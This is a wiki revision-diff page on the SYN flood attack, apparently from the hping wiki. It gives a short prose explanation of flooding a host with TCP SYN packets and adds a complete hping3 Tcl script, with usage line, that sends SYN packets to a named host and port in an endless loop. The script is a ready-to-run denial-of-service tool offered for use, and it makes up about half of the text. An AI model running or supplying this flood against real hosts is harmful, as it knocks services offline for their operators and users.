Differences for page SYN floodCurrent version compared with version Sun Sep 19 15:47:43 GMT 2004...
- The SYN flood is an attack that today can be defined "old", but the general idea is still working.
- The goal of this attack is to send TCP connections requests faster than a machine can process them
- in order to saturate the resources, and let the machine unable to accept more connections.
+ !!The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).
+
+
+ The goal of this attack is to send TCP connection requests faster than a machine can process them
+ in order to saturate the resources and prevent the machine from accepting any more connections.
Actually the attacker does not create a whole TCP connection, but just send a SYN packet
(the first packet required to start a TCP connetion), spoofing at random the source IP address,
so from the attacker point of view the resource to perform the attack is only the bandwidth
...
- + ----
+
+
+ This wiki is nothing without code, so here we go (as .htcl file).....
+
+ # (c) GPL2 fluxist(at)gmail.com
+ # Usage; hping3 exec ./synflood.htcl <hostname> <dstport>
+
+ if {$argc < 2} {
+ puts "Required arguments: hostname dstport"
+ exit 1
+ }
+
+ foreach {hostname port} $argv break
+ set srcport 14000
+ set target [hping resolve $hostname]
+ set myaddr [hping outifa $target]
+
+ puts "Synflooding $target..."
+
+ while {1} {
+ hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
+ } The following is the old page content
|